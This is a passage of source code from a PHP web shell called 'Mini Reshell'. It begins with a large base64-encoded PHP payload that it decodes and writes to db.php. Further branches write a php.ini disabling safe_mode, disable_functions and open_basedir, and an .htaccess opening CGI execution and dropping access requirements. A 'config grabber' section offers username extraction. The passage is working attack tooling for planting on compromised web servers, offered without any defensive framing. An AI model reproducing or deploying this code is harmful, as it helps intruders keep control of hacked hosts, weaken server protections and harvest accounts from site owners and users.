R1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
  600.         file_put_contents("db.php",base64_decode($script));
  601.          echo "<script>alert('done! check db.php'); hideAll();</script>";
  602.         echo "<p><center><font color=green>Check = >> <a href='db.php' target=_blank><b>db.php</b></a></font></center>
  603.          
  604.      
  605.      
  606.         </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  607.         <br><center>$nick Mini Reshell</center> ";
  608.         die();
  609.         }
  610. //create php.ini for safe mode
  611.         elseif ( $pilih == 'phini') {
  612.         $byht = "safe_mode = Off
  613.         disable_functions = None
  614.         safe_mode_gid = OFF
  615.         open_basedir = OFF
  616.         allow_url_fopen = On";
  617.         file_put_contents("php.ini",$byht);
  618.         echo "<script>alert('php.ini Created'); hideAll();</script>";
  619.         die();
  620.         }
  621. //forbiden
  622.         elseif ( $pilih == 'forbid') {
  623.         $hateaces = "AddHandler application/x-httpd-php4 .php .php4 .php3
  624. Options +FollowSymLinks +Indexes
  625. DirectoryIndex default.html
  626. AddType text/html php
  627. Options +ExecCGI
  628. AddHandler cgi-script cgi pl xt
  629.  
  630. AddHandler cgi-script cgi pl tg love h4 tgb cbg lta izo vic
  631.  
  632. DirectoryIndex Sux.html
  633. AddType text/plain .php
  634. AddHandler server-parsed .php
  635. AddType text/plain .html
  636. AddHandler txt .html
  637. Require None
  638. Satisfy Any";
  639.         file_put_contents(".htaccess",$hateaces);
  640.         echo "<script>alert('.htaccess Created'); hideAll();</script>";
  641.         die();
  642.         }
  643.     }
  644.     }
  645.     ?>
  646.  
  647.    
  648.    
  649.    <?php
  650. //itachi quotes
  651.     if(isset($_GET['beby']) && ($_GET['beby'] == 'quotes')){
  652. ?>
  653.  
  654. <br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Itachi Quotes </th></tr><td>
  655. Kita Tidak Tahu Orang Seperti Apa Kita Sebenarnnya, Sampai Di Saat Detik-Detik Kematian Kita Tiba....<br>Saat Itulah Kita Akan Tahu Orang Seperti Apa Kita Sebenarnya !!
  656. </td></tr></table>
  657.  
  658.  
  659. <?php
  660. }
  661. //contfig grabber
  662. if(isset($_GET['beby']) && ($_GET['beby'] == 'config'))
  663. {
  664. ?>
  665. <form action="?beby=config" method="post">
  666. <br>
  667.  
  668. <form method=post><font color=white size=2 face="Tahoma">Create php.ini</font><p>
  669. <input type=submit name=ini value="use to Generate PHP.ini" /></p></form>
  670. <form method=post><font color=white size=2 face="Tahoma">Search Username</font><p>
  671. <input type=submit name="usre" value="use to Extract usernames" /></p></form>
  672.  
  673.  
  674. <?php
  675. //php.ini
  676. if(isset($_POST['ini']))
  677. {
  678. $r=fopen('php.ini','w');
  679. $rr="safe_mode=OFF
  680. disable_functions=NONE";
  681. fwrite($r,$rr);
  682. $link="<a href=php.ini><font color=white size=2 face=\"Tahoma\"><u>buka di newtab PHP.INI</u></font></a>";
  683. echo $link;
  684. }
